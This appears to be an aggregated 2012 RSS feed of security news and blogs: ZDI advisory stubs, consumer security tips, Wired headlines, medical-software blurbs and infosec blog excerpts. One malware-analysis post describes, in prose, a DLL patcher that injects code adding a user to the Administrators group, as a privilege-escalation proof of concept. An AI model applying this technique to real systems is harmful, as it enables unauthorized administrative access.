http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1512: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1511: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1501: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1468: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2011-12-22, 354 days ago. The vendor is given until 2012-06-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1480: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'gwslabs.com' was reported to the affected vendor on: 2011-12-19, 357 days ago. The vendor is given until 2012-06-16 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1437: Honeywell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-11-23, 383 days ago. The vendor is given until 2012-05-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1429: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'ptzool' was reported to the affected vendor on: 2011-11-04, 402 days ago. The vendor is given until 2012-05-02 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1322: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrzej Dyjak' was reported to the affected vendor on: 2011-10-28, 409 days ago. The vendor is given until 2012-04-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1383: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Alin Rad Pop' was reported to the affected vendor on: 2011-10-21, 416 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1347: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2011-10-21, 416 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1329: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2011-08-12, 486 days ago. The vendor is given until 2012-02-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Don’t fall for the Facebook privacy notice hoax

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Have you posted the notice to your Facebook timeline to proclaim your copyright ownership of all content? Have you seen others from your social network posting such a notice? If you havent already, dont bother. Its a hoax. Its not even a new hoax. Its a resurgence of an old hoax that many users fell for earlier this year when Facebook became a publicly-traded company. The previous hoax implied that the change from a private company to a public one somehow changed the rules of the privacy agreement and put your posts and photos at risk unless you posted a copy and paste of a disclaimer establishing your copyright ownership. You can't change the Facebook legal terms by posting on your timeline. The new one reads: In response to the new Facebook guidelines I hereby declare that my copyright is attached to all of my personal details, illustrations, paintings, writing, publications, photos and videos, etc. (as a result of the Berne Convention). To read this article in full or to leave a comment, please click here

==> With shopping scams on the rise, watch for these threats

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Tomorrow is Thanksgiving, which means only one thingthe glorious chaos we call the Holiday Shopping Season will soon be upon us. Holiday shopping also means a spike in online scams, fraud, and malware, so you need to be aware of the risks and threats, and exercise some common sense to avoid a cyber-Grinch incident. Intrepid shoppers will line up for Black Friday deals that have spilled over to Thanksgiving Thursday. You can now start your Black Friday shopping between the turkey feast and the pumpkin pie, before the football games are even over on Thanksgiving Day. The definition of Friday aside, holiday shopping will officially be underway. Black Friday will be followed by Cyber Monday, and many shoppers will turn to their mobile devices to find great deals, so its primetime for cybercriminals. Be careful what apps you install and what you click on from your mobile device. Rising threat of mobile scams and malware Black Friday is generally an in-person, brick-and-mortar-store shopping experience, but competition from online retailers and Cyber Monday, combined with the explosion of connected shoppers armed with mobile devices, has changed the game. A report from iovation, a mobile device security and reputation management company, claims that online retail transactions from mobile devices have increased 300 percent over last year. Mobile transactions accounted for nearly one in ten purchases in the most recent quarter, and that number is expected to spike up for holiday shopping. To read this article in full or to leave a comment, please click here

==> US teens lead the way for shady, risky online behavior

http://feeds.pcworld.com/pcworld/blogs/security_alert/ What does your teen do when he or she is online? Do you know? Teens in general partake in riskier online behavior than your average user, but according to a recent study from McAfeeExploring the Digital Divideteens in the United States are even more likely to engage in shady online activities. The new report is a follow up to McAfees The Digital Divide: How the Online Behavior or Teens Is Getting Past Parents, released earlier this year. The original survey focused solely on the United States, but the new one expands the scope to include teens in European countries for comparison. The results might be a bit discouraging for parents of US teens. Teens in the United States lead in almost every category of shady online behavior. Nearly a third of US teens have used the Web to intentionally surf for bleep. US teens also lead in using mobile devices to cheat on tests, and are tied for second in using the Internet as a platform for cyber bullyingonly half a percentage point behind the Netherlands. Go USA? To read this article in full or to leave a comment, please click here

==> Here's how to secure your email and avoid becoming a ‘Petraeus’

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It was a shock when David Petraeusa respected and highly-decorated Army generalabruptly stepped down from his post as the director of the CIA earlier this week. It was even more of a jolt to learn that his resignation was due to an extramarital affair. But, the real story might be the fact that the affair came to light more or less accidentally as a result of poor email and privacy practices. First, a little background on how things went down. The affair between David Petraeus and his biographer Paula Broadwell seems like something from the Showtime series Homeland, or perhaps a James Bond plot line, but the events that led to the FBI investigation that uncovered the affair are a bit more Fatal Attraction. Broadwell sent anonymous threatening emails to another woman she considered to be competition for Petraeus affection, and that womanJill Kelleyinitiated the investigation that eventually unraveled the affair and led to the downfall of one of this generation's greatest American heroes. I dont want to teach anyone how to cover their illicit tracks better, or how to have a more clandestine affair, but lets take a look at where Petraeus and Broadwell went wrong so you can understand how to cover your tracks better in general, and how to secure your email and protect your privacy online. To read this article in full or to leave a comment, please click here

==> Out of date, vulnerable browsers put users at risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Is your browser up to date? According to the results of a new survey from Kasperskya security software vendornearly a quarter of the browsers currently in use are out of date. Surfing the Web with a vulnerable browser is a recipe for disaster. The Web browser has evolved to become the primary software used on many PCs. People access their email, surf websites, create documents and spreadsheets, access cloud-based file storage and sharing sites, and share with others on social networking sitesall through the browser. Attackers no this as well, which is why it is exceptionally risky to use a browser with known vulnerabilities. Kaspersky gathered anonymous data through its cloud-based Kaspersky Security Network. Kaspersky researchers analyzed the browser usage data from millions of customers around the world, and uncovered some concerning trends. * 23 percent of browsers are not current: 14.5 percent are still using the previous version, while 8.5 percent are using even older, obsolete versions. * When a new version of a browser is released, it can take nearly 10 days for it to surpass the previous version in usage, and an average of about a month for a majority of users to upgrade. Keep your browser up to date to avoid Web-based attacks. The major browsers all have automatic update mechanisms in place. The easiest way to make sure your browser is current is to enable the automatic updates and let them do what theyre meant to dokeep your browser up to date without requiring you to manage the process yourself. To read this article in full or to leave a comment, please click here

==> Study finds 25 percent of Android apps to be a security risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to a new report from Bit9a security vendor with a focus on defending against advanced persistent threats (APT)there is a one in four chance that downloading an Android app from the official Google Play market could put you at risk. Bit9 analyzed 400,000 or so apps in Google Play, and found over 100,000 it considers to be on the shady side. Does that mean that the sky is falling, and everyone with an Android smartphone or tablet should abandon it immediately? No. The research by Bit9 illustrates some issues with app development in general, and should raise awareness among mobile users to exercise some discretion when downloading and installing apps, but its not a sign of any urgent crisis affecting Android apps. Use discretion rather than blindly granting permissions to apps. The report from Bit9 isnt about apps that contain malware, or are even overtly malicious for that matter. Bit9 reviewed the permissions requested by the apps, and examined the security and privacy implications of granting those permissions. The reality is that many apps request permission to access sensitive content they have no actual need for. Bit9 says that 72 percent of all Android apps in the Google Play market request access to at least one potentially risky permission. For example, 42 percent request access to GPS location data, 31 percent want access to phone number and phone call history, and 26 percent ask for permission to access personal information. Bit9 discovered 285 apps that use 25 or more system permissions. To read this article in full or to leave a comment, please click here

==> Shamed by Mugshot Sites, Arrestees Try Novel Lawsuit

http://feeds.wired.com/wired27b Shamed by Mugshot Sites, Arrestees Try Novel LawsuitWebsites that host booking photos and charge hundreds of dollars to remove the mugshots are proliferating across the country, raking in fortunes from those wanting to keep their arrest and criminal records off search engines.

==> Supreme Court Asked to Review $222K Landmark File-Sharing Case

http://feeds.wired.com/wired27b Supreme Court Asked to Review $222K Landmark File-Sharing CaseInfamous file-sharer Jammie Thomas-Rasset asked the Supreme Court on Monday to review a jury's conclusion that she pay the recording industry $222,000 for downloading and sharing two dozen copyrighted songs on

==> Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

http://feeds.wired.com/wired27b Public Buses Across Country Quietly Adding Microphones to Record Passenger ConversationsTransit authorities in cities across the country are quietly installing microphone-enabled surveillance systems on public buses that would give them the ability to record and store private conversations. The

==> FTC Probing bleep’s Mobile Apps for Privacy Breaches

http://feeds.wired.com/wired27b FTC Probing bleep’s Mobile Apps for Privacy BreachesThe Obama administration said Monday it was investigating the mobile app space for bleep concerning privacy breaches of federal law that include the unauthorized collection and sharing of personal information. The

==> Feds Charge Anonymous Spokesperson for Sharing Hacked Stratfor Credit Cards

http://feeds.wired.com/wired27b Feds Charge Anonymous Spokesperson for Sharing Hacked Stratfor Credit CardsA Dallas grand jury has brought charges against Anonymous spokesman Barrett Brown stemming from the 2011 hack of intelligence vendor Stratfor Global Intelligence. Brown isn’t charged with committing the hack; just with possessing and transmitting credit card numbers that

==> Mailing Fake Anthrax Is Not Protected Speech, Court Says

http://feeds.wired.com/wired27b Mailing Fake Anthrax Is Not Protected Speech, Court SaysA California man convicted for mailing small packets of sugar marked as Anthrax to promote a book about the deadly toxin cannot rightfully claim he had a First Amendment right to carry out the 2008 campaign that had left

==> Washington Drops Defense of Online ‘Adult Services’ Law

http://feeds.wired.com/wired27b Washington Drops Defense of Online ‘Adult Services’ LawWashington state is halting its defense of a landmark law requiring online companies to

==> Hollywood’s Total Piracy Awareness Program Set for January Launch

http://feeds.wired.com/wired27b Hollywood’s Total Piracy Awareness Program Set for January LaunchBeginning in a few weeks, the nation's major internet service providers will roll out an initiative -- backed by Obama and pushed by Hollywood and the record labels -- to disrupt and possibly terminate internet access

==> John McAfee Hospitalized in Guatemala

http://feeds.wired.com/wired27b John McAfee Hospitalized in GuatemalaJohn McAfee has been hospitalized in Guatemala to treat a possible heart attack, according to ABC’s Matt Gutman. McAfee was detained by Guatemala’s National Civil Police on Wednesday for entering the country illegally. John McAfee retained

==> Appeals Court Sides With Bush Wiretapping

http://feeds.wired.com/wired27b Appeals Court Sides With Bush WiretappingA federal appeals court is refusing to reconsider its August ruling in which it said the federal government may spy on Americans' communications without warrants and

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there’s information available to help. The Best Web Hosts is great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practices server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditabs Intelligent Medical Software (IMS) combine features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthys NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an offices current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKessons Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Googles Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEyecreated has caused them to backpeddlequite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know. I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even thoughit wasn’t a far fall -a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven’t blogged anything of good use lately so I thought I would start upagain by calling out this completelyuseless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled; “Share –Or Keep Getting Pwned” Sigh. Clearly zero research was done in to this posting as there really is a lot of [...]

==> Week 49 in Review – 2012

http://infosecevents.net/feed/ Event Related SANS SANS SEC642: Advanced Web App Penetration Testing and Ethical Hacking (review) – blog.c22.cc After taking a year off from SANS London (a trip to Colombia was too much to resist last year), I flew back over to sunny London (ha) to attend the new SEC642: Advanced Web App Penetration Testing class with [...]

==> Week 48 in Review – 2012

http://infosecevents.net/feed/ Event Related Hacker Internship – nds.ruhr-uni-bochum.de Web applications are in the age of Web 2.0 increasingly become the target of attackers. Thus no problem SQL injection foreign databases are compromised, stolen by XSS vulnerability browser sessions and via cross-site request forgery you get from one day to the countless new friends in a social network. [...]

==> Week 47 in Review – 2012

http://infosecevents.net/feed/ Event Related DOAG 2012: Best of Oracle Security 2012 – blog.red-database-security.com Yesterday I gave a presentation Best of Oracle Security 2012 at the DOAG 2012 conference in Nrnberg. Resources cfbackdoor – gironsec.com This is a text file. Tools Util Util – Windows Handles Viewer (Simple GUI with REPL) v1.0.exe – diniscruz.blogspot.com Based on the Util [...]

==> Week 46 in Review – 2012

http://infosecevents.net/feed/ Resources VulnVoIP (Vulnerable VoIP) – The Fundamentals of VoIP Hacking – rebootuser.com VulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail. Owning Computers Without Shell Access – accuvant.com Whats This All [...]

==> Week 45 in Review – 2012

http://infosecevents.net/feed/ Event Related OWASP OWASP AppSec 2012 Presentation: SQL Server Exploitation, Escalation, and Pilfering – netspi.com During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. XSS & CSRF with HTML5 – Attack, Exploit and Defense – shreeraj.blogspot.com HTML5 [...]

==> Week 44 in Review – 2012

http://infosecevents.net/feed/ Event Related Hashdays Hashdays Wrap-up Day #1 – blog.rootshell.be Im in Luzern for a few days but the Hashdays security conference started today! w00t! This is the first edition for me. A very nice opening session performed by the defcon-switzerland group which organises this event. Hashdays Wrap-Up Day #2 – blog.rootshell.be Yesterday evening, I went [...]

==> Information Security Events For November

http://infosecevents.net/feed/ Here are information security events in North America this month: Hackfest: November 2 to 3 in Quebec, Canada BSides DFW : November 3 in Dallas, Texas USA Cloud Security Alliance Congress : November 7 and 8 in Florida, USA PhreakNIC : November 9 to 11 in Tennessee, USA Bsides [...]

==> Week 43 in Review – 2012

http://infosecevents.net/feed/ Event Related ToorCon ToorChat – github.com A Chat Program for use with the ToorCon 2013 badge. ToorCon Presentation – brightmoonsecurity.com Thanks for attending my Toorcon Presentation. Below are links to my presentation and the references I mentioned in the talk. Please let me know if you have any recommendations on course materials. ToorCon Presentation – [...]

==> Week 42 in Review – 2012

http://infosecevents.net/feed/ Event Related Ruxcon Breakpoint Ruxcon Breakpoint kicks off with a bang – risky.biz The inaugural Ruxcon Breakpoint security conference has kicked off with a bang in Melbourne. Pacemakers, defibrillators open to attack (The Register) – risky.biz The researcher in question, Barnaby Jack, today told the Ruxcon Breakpoint security conference in Melbourne, Australia that the most [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the [...]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes and excellent point in the article, “we’ve grown to [...]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his [...]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily [...]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows [...]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I [...]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the [...]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The [...]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and i enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there Information Security: From Ineffective to Innovative Arthur [...]

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt: cmd /v:on set lines = 0 for /r %a in (*.java) do (find /v /c "" "%a" > %temp%\temp.txt for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)) echo %lines% The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issues when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

